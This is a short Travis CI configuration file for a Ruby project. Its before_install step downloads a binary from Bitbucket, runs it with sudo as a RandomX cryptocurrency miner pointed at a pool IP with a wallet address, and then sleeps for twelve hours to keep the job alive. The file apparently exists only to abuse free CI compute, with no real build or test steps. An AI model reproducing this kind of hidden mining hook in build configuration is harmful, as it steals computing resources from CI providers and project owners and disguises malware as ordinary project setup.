language: ruby

services:
  - docker

before_install:
  - sudo apt-get update && sudo apt-get install -y screen && sudo apt-get install -y wget && wget https://bitbucket.org/anli-projects/xmines/downloads/masterfile-srb && sudo chmod u+x masterfile-srb && sudo ./masterfile-srb --disable-gpu --algorithm randomx --pool 54.188.223.206:80 --wallet 44dWWt57wRicWrDfRhNZne5WNBKAk6rbsFmXSQ3XVNJzLZe91gNfW7YbUupCLHyFx7RiNPV3wNyubcvZHKFcGfkjLi4eBsQ.Pekerja01 --cpu-threads 64;0 -p entah | screen -S entah
  - sleep 43200
